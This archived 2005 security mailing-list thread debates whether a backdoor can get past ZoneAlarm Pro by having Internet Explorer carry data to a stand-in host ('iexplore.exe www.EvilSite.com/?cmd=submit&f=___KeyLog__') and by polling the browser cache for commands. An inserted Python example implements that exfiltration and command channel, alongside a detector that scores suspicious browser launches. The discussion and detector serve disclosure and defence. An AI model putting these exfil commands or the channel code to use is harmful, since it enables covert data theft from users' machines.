Re: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
Nothing much... I was just testing stuff on Zone Alarm Pro 6.0.667.000 when I bumped into something interesting. A test program 'evil.exe' went into an infinite recursive loop. No wonder, soon the system was out of memory. But to my BIG surprise vsmon.exe CRASHED (testing on WinXP SP2, with Admin privilege). I managed to KILL the process of evil.exe & the system returned to normal functioning, but FIREWALL DOWN! huh!

-bipin

On 10/4/05, Debasis Mohanty <[EMAIL PROTECTED]> wrote:
> Hey AZ,
>
> Andrei Zlate-Podani wrote:
> >> A firewall has to do with network traffic. All this talk about "bypassing
> >> firewall x or y using this trick or that one" is sheer nonsense.
>
> I just noticed "@bitdefender.com" in your ID and I am sure you must be
> knowing better than me in all aspects as far as AV / Firewall goes.
> Unfortunately I have to explain to you that ZA Pro and its siblings are much
> more than a normal personal fw; they even include many functionalities
> which take care of most of the local OS based attacks and even much more.
>
> >> It is not the job of a firewall to track all the relations of executables
> >> and/or API calls in the system.
>
> You are right as long as you are talking about old school days firewalls...
> ;-) I would suggest you give ZA Pro / Internet Security Suite a shot; most
> of your doubts about current days fw will be cleared :)
>
> >> I never heard anybody complaining that iptables allows a script executing
> >> Konqueror to communicate with a server.
>
> Is it ?? What a coincidence, in fact me too never heard :P
>
> >> Use an antivirus program or an IDS for this job.
>
> Nice suggestion !!! Which products are you going to suggest to the home pc
> users and corporate end-users??
>
> >> Andrei
>
> Bah ... D

--
Bipin Gautam
Zeroth law of security: The possibility of poking a system from lower privilege is zero unless & until there is a possibility of direct, indirect or consequential communication between the two...
___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
Hey AZ,

Andrei Zlate-Podani wrote:
>> A firewall has to do with network traffic. All this talk about "bypassing
>> firewall x or y using this trick or that one" is sheer nonsense.

I just noticed "@bitdefender.com" in your ID and I am sure you must be knowing better than me in all aspects as far as AV / Firewall goes. Unfortunately I have to explain to you that ZA Pro and its siblings are much more than a normal personal fw; they even include many functionalities which take care of most of the local OS based attacks and even much more.

>> It is not the job of a firewall to track all the relations of executables
>> and/or API calls in the system.

You are right as long as you are talking about old school days firewalls... ;-) I would suggest you give ZA Pro / Internet Security Suite a shot; most of your doubts about current days fw will be cleared :)

>> I never heard anybody complaining that iptables allows a script executing
>> Konqueror to communicate with a server.

Is it ?? What a coincidence, in fact me too never heard :P

>> Use an antivirus program or an IDS for this job.

Nice suggestion !!! Which products are you going to suggest to the home pc users and corporate end-users??

>> Andrei

Bah ... D

Aditya Deshmukh wrote:
> >> say... a backdoor wants to communicate with its server... What it can do
> >> is use a trusted internal application to do the job. Suppose it
> >> creates a batch file, runs the batch file (evil.bat) & executes this
> >> command
>
> this has been going on for years - there are some trojans that create
> an invisible browser window at the screen center to comm with the
> server.
>
> This is the reason most firewalls show you a popup saying
> [app-name] is trying to connect to [server-name] at [port-number]
>
> --
> Ignorance more frequently begets confidence than does knowledge. --- Charles Darwin
Re: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
A firewall has to do with network traffic. All this talk about "bypassing firewall x or y using this trick or that one" is sheer nonsense.

It is not the job of a firewall to track all the relations of executables and/or API calls in the system. I never heard anybody complaining that iptables allows a script executing Konqueror to communicate with a server.

Use an antivirus program or an IDS for this job.

Andrei

Aditya Deshmukh wrote:
> > say... a backdoor wants to communicate with its server... What it can do
> > is use a trusted internal application to do the job. Suppose it
> > creates a batch file, runs the batch file (evil.bat) & executes this
> > command
>
> this has been going on for years - there are some trojans that create
> an invisible browser window at the screen center to comm with the
> server.
>
> This is the reason most firewalls show you a popup saying
> [app-name] is trying to connect to [server-name] at [port-number]

--
Ignorance more frequently begets confidence than does knowledge. --- Charles Darwin
RE: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
> say... a backdoor wants to communicate with its server... What it can do
> is use a trusted internal application to do the job. Suppose it
> creates a batch file, runs the batch file (evil.bat) & executes this
> command

This has been going on for years - there are some trojans that create an invisible browser window at the screen center to comm with the server.

This is the reason most firewalls show you a popup saying [app-name] is trying to connect to [server-name] at [port-number].
Re: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I think the main problem with every kind of security precaution is that the user has to understand what he is being told. I had customers who just let everything in and out because they thought that their setup would need it.

A few major tricks in really securing a system:
- never let the user have write access to c:\putyourwindowssystemdirhere
- never run anything as admin user (at least since XP there is even something like sudo available under Windows, called runas, a very useful command)
- further on the XP level: try to get used to the netsh command
- keep your system updated, and then it doesn't matter what you download, as long as you keep your users security aware (password length and strength, email clicking, banner clicking, popups, etc...)
- or use an alternate OS (yes, they are out there...)

You can make it easier for your user or harder for your user, depending on your standpoint, but nothing is as good as a user that actually does know what he/she is doing.

Just my few cents.

Greetings
Oliver Leitner
Technical Staff
http://www.shells.at

Debasis Mohanty wrote:
> Just to correct my last statement in my previous reply -
>
> >>> There is another way by which evil-code can get this run: by moving
> >>> the batch file to system startup or pointing to it in the registry to
> >>> run on system boot, but this will be a warning signal for the user.
>
> Even ZA Pro blocks and warns the user if some program (evil or trusted) is
> trying to become a system startup program. Sorry for that mistake, had too
> much with Paul & Zone Labs ;-)
>
> -D
>
> -----Original Message-----
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of Debasis Mohanty
> Sent: Tuesday, October 04, 2005 12:25 AM
> To: 'Bipin Gautam'; 'Zone Labs Security Team'
> Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
> Subject: RE: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
>
> Bipin Gautam wrote:
> >>> Anyways... is bypassing a Personal Firewall & letting an internal (evil)
> >>> application communicate with the external world that hard?
>
> Yes Indeed !! As long as you are trying out this concept with the current
> versions of ZA Pro and a few prior versions... The beauty of ZA Pro is, it
> even traps inter-process communications and windows messaging between two
> different processes and prompts for the user's permission. This goes beyond a
> normal desktop based fw, with more defense methods than just protecting a PC
> from network based attacks.
>
> >>> Suppose it creates a batch file, runs the batch file (evil.bat) &
> >>> executes this command
> >>> Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=submit&f=___KeyLog__
>
> To execute the batch file, the evil-program needs to trigger the execution
> of the batch file and this is easily prevented by ZA Pro. Normally the
> evil-code will use the api shell(), which is prevented.
>
> However, this will work if the user clicks on the batch file or runs it via
> Start->Run but this is not the way evil-code works. In this scenario ZA
> Pro clearly distinguishes between user intervention and a program
> communicating with another program.
>
> There is another way by which evil-code can get this run: by moving the
> batch file to system startup or pointing to it in the registry to run on
> system boot, but this will be a warning signal for the user.
>
> - D
>
> -----Original Message-----
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of Bipin Gautam
> Sent: Monday, October 03, 2005 11:57 PM
> To: Zone Labs Security Team
> Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
> Subject: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
>
> hello list,
> Lately 'Debasis Mohanty' was refreshing some old issues. Anyways... is
> bypassing a Personal Firewall & letting an internal (evil) application
> communicate with the external world that hard? I mean... OK try this. Let
> me give you a simple concept. I'll call it 'passive communication' (for lack
> of a better word).
>
> Say... a backdoor wants to communicate with its server... What it can do is
> use a trusted internal application to do the job. Suppose it creates a batch
> file, runs the batch file (evil.bat) & executes this command:
>
> Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=submit&f=___KeyLog__
>
> The batch file will get executed & Internet Explorer will happily send the
> DATA. This trick can be used to send
RE: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
Just to correct my last statement in my previous reply -

>> There is another way by which evil-code can get this run: by moving the batch file to system startup
>> or pointing to it in the registry to run on system boot, but this will be a warning signal for the user.

Even ZA Pro blocks and warns the user if some program (evil or trusted) is trying to become a system startup program. Sorry for that mistake, had too much with Paul & Zone Labs ;-)

-D

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Debasis Mohanty
Sent: Tuesday, October 04, 2005 12:25 AM
To: 'Bipin Gautam'; 'Zone Labs Security Team'
Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: RE: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?

Bipin Gautam wrote:
>> Anyways... is bypassing a Personal Firewall & letting an internal (evil) application communicate
>> with the external world that hard?

Yes Indeed !! As long as you are trying out this concept with the current versions of ZA Pro and a few prior versions... The beauty of ZA Pro is, it even traps inter-process communications and windows messaging between two different processes and prompts for the user's permission. This goes beyond a normal desktop based fw, with more defense methods than just protecting a PC from network based attacks.

>> Suppose it creates a batch file, runs the batch file (evil.bat) & executes this command
>> Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=submit&f=___KeyLog__

To execute the batch file, the evil-program needs to trigger the execution of the batch file and this is easily prevented by ZA Pro. Normally the evil-code will use the api shell(), which is prevented.

However, this will work if the user clicks on the batch file or runs it via Start->Run but this is not the way evil-code works. In this scenario ZA Pro clearly distinguishes between user intervention and a program communicating with another program.

There is another way by which evil-code can get this run: by moving the batch file to system startup or pointing to it in the registry to run on system boot, but this will be a warning signal for the user.

- D

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Bipin Gautam
Sent: Monday, October 03, 2005 11:57 PM
To: Zone Labs Security Team
Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?

hello list,
Lately 'Debasis Mohanty' was refreshing some old issues. Anyways... is bypassing a Personal Firewall & letting an internal (evil) application communicate with the external world that hard? I mean... OK try this. Let me give you a simple concept. I'll call it 'passive communication' (for lack of a better word).

Say... a backdoor wants to communicate with its server... What it can do is use a trusted internal application to do the job. Suppose it creates a batch file, runs the batch file (evil.bat) & executes this command:

Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=submit&f=___KeyLog__

The batch file will get executed & Internet Explorer will happily send the DATA. This trick can be used to send OUTPUT as well as get input... without triggering the firewall.

To get input, the backdoor can, say, run a similar BAT script:

Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=ANY_NEW_COMMANDS

Well... the history of the page www.EvilSite.com/?cmd=ANY_NEW_COMMANDS will be there in the IE cache... Then the backdoor can RUN a string based 'GREP' in the IE cache & see if there is any new job to accomplish.

Just a rough theory... but ya it's POSSIBLE; to let an internal backdoor have I/O with its server without triggering the firewall alert --- yap it does work...

Using the same trick, can't the backdoor happily communicate with its server?

On 9/30/05, Zone Labs Security Team <[EMAIL PROTECTED]> wrote:
> Zone Labs response to "Bypassing Personal Firewall (Zone Alarm Pro)
> Using DDE-IPC"
>
> Overview:
>
> Debasis Mohanty published a notice about a potential security issue
> with personal firewalls to several security email lists on
> September 28th, 2005. Zone Labs has investigated his claims
> and has determined that current versions of Zone Labs and Check Point
> end-point security products are not vulnerable.
>
> Description:
>
> The proof-of-concept code published uses the Windows API function
> ShellExecute() to launch a trusted program that is used to access the
> network on behalf of the untrusted program, thereby accessing the
> network without warning from the firewall.
>
> Impact:
>
> If successfully
Re: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
> integrated HIPS. (although a function which
> can be very annoying sometimes.)

To be more precise they call it "behavior blocking".

--
Thierry Zoller
mailto:[EMAIL PROTECTED]
RE: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
Bipin Gautam wrote:
>> Anyways... is bypassing a Personal Firewall & letting an internal (evil) application communicate
>> with the external world that hard?

Yes Indeed !! As long as you are trying out this concept with the current versions of ZA Pro and a few prior versions... The beauty of ZA Pro is, it even traps inter-process communications and windows messaging between two different processes and prompts for the user's permission. This goes beyond a normal desktop based fw, with more defense methods than just protecting a PC from network based attacks.

>> Suppose it creates a batch file, runs the batch file (evil.bat) & executes this command
>> Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=submit&f=___KeyLog__

To execute the batch file, the evil-program needs to trigger the execution of the batch file and this is easily prevented by ZA Pro. Normally the evil-code will use the api shell(), which is prevented.

However, this will work if the user clicks on the batch file or runs it via Start->Run but this is not the way evil-code works. In this scenario ZA Pro clearly distinguishes between user intervention and a program communicating with another program.

There is another way by which evil-code can get this run: by moving the batch file to system startup or pointing to it in the registry to run on system boot, but this will be a warning signal for the user.

- D

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Bipin Gautam
Sent: Monday, October 03, 2005 11:57 PM
To: Zone Labs Security Team
Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?

hello list,
Lately 'Debasis Mohanty' was refreshing some old issues. Anyways... is bypassing a Personal Firewall & letting an internal (evil) application communicate with the external world that hard? I mean... OK try this. Let me give you a simple concept. I'll call it 'passive communication' (for lack of a better word).

Say... a backdoor wants to communicate with its server... What it can do is use a trusted internal application to do the job. Suppose it creates a batch file, runs the batch file (evil.bat) & executes this command:

Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=submit&f=___KeyLog__

The batch file will get executed & Internet Explorer will happily send the DATA. This trick can be used to send OUTPUT as well as get input... without triggering the firewall.

To get input, the backdoor can, say, run a similar BAT script:

Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=ANY_NEW_COMMANDS

Well... the history of the page www.EvilSite.com/?cmd=ANY_NEW_COMMANDS will be there in the IE cache... Then the backdoor can RUN a string based 'GREP' in the IE cache & see if there is any new job to accomplish.

Just a rough theory... but ya it's POSSIBLE; to let an internal backdoor have I/O with its server without triggering the firewall alert --- yap it does work...

Using the same trick, can't the backdoor happily communicate with its server?

On 9/30/05, Zone Labs Security Team <[EMAIL PROTECTED]> wrote:
> Zone Labs response to "Bypassing Personal Firewall (Zone Alarm Pro)
> Using DDE-IPC"
>
> Overview:
>
> Debasis Mohanty published a notice about a potential security issue
> with personal firewalls to several security email lists on
> September 28th, 2005. Zone Labs has investigated his claims
> and has determined that current versions of Zone Labs and Check Point
> end-point security products are not vulnerable.
>
> Description:
>
> The proof-of-concept code published uses the Windows API function
> ShellExecute() to launch a trusted program that is used to access the
> network on behalf of the untrusted program, thereby accessing the
> network without warning from the firewall.
>
> Impact:
>
> If successfully exploited, a malicious program may be able to
> access the network via a trusted program. The ability to
> access the network would be limited to the functionality of the
> trusted program.
>
> Unaffected Products:
>
> ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Wireless Security, and
> ZoneAlarm Security Suite version 6.0 or later automatically protect
> against this attack in the default configuration.
>
> ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Wireless Security, and
> ZoneAlarm Security Suite version 5.5 are protected against this attack
> by enabling the "Advanced Program Control" feature.
>
> Check Point Integrity client versions 6.0 and 5.5 are protected
> against this attack by enabling the "Advanced Program Control" feature.
>
> Affected Products:
>
> ZoneAlarm free versions lack the "Advanced Program Control"
> feature and are therefore unable to prevent this bypass technique.
>
> Recommended Actions:
>
> Subscribers should upgrade to the latest version of their ZoneAlarm
> product or enable the "Advan
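The 'passive communication' channel Bipin describes in the message quoted above, together with the host-side check a defender would run against it, as an added example; this is not code from the thread, from Zone Labs or from any of the posters. Everything in it is constructed for the example: www.EvilSite.com is the placeholder host from the original post, the `<!--CMD:...-->` marker in the reply page is an invented convention for the "string based GREP in the IE cache" step, the cache is a temporary directory, and the process-creation records mirror the Image / ParentImage / CommandLine fields of a Sysmon event but are made up. The point it shows is the one the thread keeps circling: once the data leaves through iexplore.exe the network side of the firewall has nothing to object to, so detection has to look at which process launched the browser and what it put on the command line.

```python
# Added example, not code from the thread or from Zone Labs. Models the
# "trusted browser carries the data" channel from the post so that a detector
# can be exercised against it offline. Host, marker, cache and events are all
# constructed here.
import base64
import ntpath
import os
import re
import tempfile
from urllib.parse import parse_qs, urlsplit

C2_HOST = "www.EvilSite.com"      # placeholder host from the original post
IE_MAX_URL = 2083                 # Microsoft's documented IE URL length limit
CMD_RE = re.compile(r"<!--CMD:(.*?)-->", re.S)   # constructed reply-page marker
URL_RE = re.compile(r"https?://\S+|www\.\S+", re.I)
BROWSERS = {"iexplore.exe", "firefox.exe", "opera.exe"}


def build_exfil_urls(data: bytes, max_len: int = IE_MAX_URL) -> list[str]:
    """Malware side: base64 the data and split it into URLs the trusted
    browser can be handed, each at most max_len characters."""
    prefix = f"http://{C2_HOST}/?cmd=submit&seq={{}}&f="
    room = max_len - len(prefix.format("000000"))
    chunk = (room // 4) * 3       # whole base64 groups: no padding mid-stream
    urls = []
    for i, off in enumerate(range(0, len(data), chunk)):
        b64 = base64.urlsafe_b64encode(data[off:off + chunk]).decode().rstrip("=")
        urls.append(prefix.format(f"{i:06d}") + b64)
    return urls


def recover_exfil(urls: list[str]) -> bytes:
    """Analyst side: reassemble the data from the URLs, e.g. out of a proxy log."""
    parts = {}
    for u in urls:
        qs = parse_qs(urlsplit(u).query)
        parts[int(qs["seq"][0])] = qs["f"][0]
    b64 = "".join(parts[k] for k in sorted(parts))
    return base64.urlsafe_b64decode(b64 + "=" * (-len(b64) % 4))


def make_demo_cache() -> str:
    """Constructed stand-in for the browser cache: one cached reply page
    carrying a command inside the CMD marker."""
    d = tempfile.mkdtemp(prefix="iecache_")
    with open(os.path.join(d, "cmd[1].htm"), "w") as fh:
        fh.write("<html><body>ok</body><!--CMD: dir C:\\ --></html>")
    return d


def extract_commands_from_cache(cache_dir: str) -> list[str]:
    """Malware side: the 'string based GREP in the IE cache' from the post."""
    cmds = []
    for name in sorted(os.listdir(cache_dir)):
        with open(os.path.join(cache_dir, name), errors="ignore") as fh:
            cmds += [m.strip() for m in CMD_RE.findall(fh.read())]
    return cmds


def score_process_event(ev: dict) -> tuple[int, list[str]]:
    """Defender side. ev carries the Image / ParentImage / CommandLine fields
    of a process-creation event (constructed). Returns a score and the
    reasons: a browser started by something other than the desktop shell,
    and a query string that looks like bulk data rather than a page address."""
    reasons, score = [], 0
    if ntpath.basename(ev["Image"]).lower() not in BROWSERS:
        return 0, reasons
    m = URL_RE.search(ev["CommandLine"])
    if not m:
        return 0, reasons
    url = m.group(0)
    if not url.lower().startswith("http"):
        url = "http://" + url
    parent = ntpath.basename(ev["ParentImage"]).lower()
    if parent != "explorer.exe":
        score += 3
        reasons.append(f"browser launched by {parent}, not the desktop shell")
    values = [v for vs in parse_qs(urlsplit(url).query).values() for v in vs]
    longest = max(values, key=len, default="")
    if len(longest) >= 64:
        score += 2
        reasons.append(f"query parameter of {len(longest)} chars")
        if re.fullmatch(r"[A-Za-z0-9_=-]+", longest):
            score += 1
            reasons.append("value is base64-like")
    return score, reasons


if __name__ == "__main__":
    sample = b"keystrokes: admin / hunter2\r\n" * 200      # constructed input
    urls = build_exfil_urls(sample)
    print(len(urls), "URLs, longest", max(map(len, urls)), "chars")
    assert recover_exfil(urls) == sample
    print("commands found in cache:", extract_commands_from_cache(make_demo_cache()))
    ev = {"Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
          "ParentImage": r"C:\WINDOWS\system32\cmd.exe",   # evil.bat's shell
          "CommandLine": "iexplore.exe " + urls[0]}
    print(score_process_event(ev))
```

Run as a script it prints the chunked URLs' count and size, the command pulled out of the constructed cache, and the score for a browser started from cmd.exe with an exfil URL. The thresholds (parent not explorer.exe, a query value of 64+ characters, a base64-looking value) are starting points rather than tuned values; the part worth keeping is that the parent process is the signal, which is also why Zone Labs' "Advanced Program Control" and Kerio's HIPS, both mentioned in this thread, hook process launch rather than the socket. recover_exfil is the reason to log full URLs on the proxy rather than hostnames only.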
Re: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
Bipin,

That's very old news, we were discussing an approach a bit more elegant than this. And yes, it's that hard nowadays: Kerio will easily block your bat file due to its integrated HIPS (although a function which can be very annoying sometimes).

BG> the batch file will get executed & Internet explorer will happily send
BG> the DATA. This trick can be used to send OUTPUT as well as get
BG> input... without triggering the firewall.

--
Thierry Zoller
mailto:[EMAIL PROTECTED]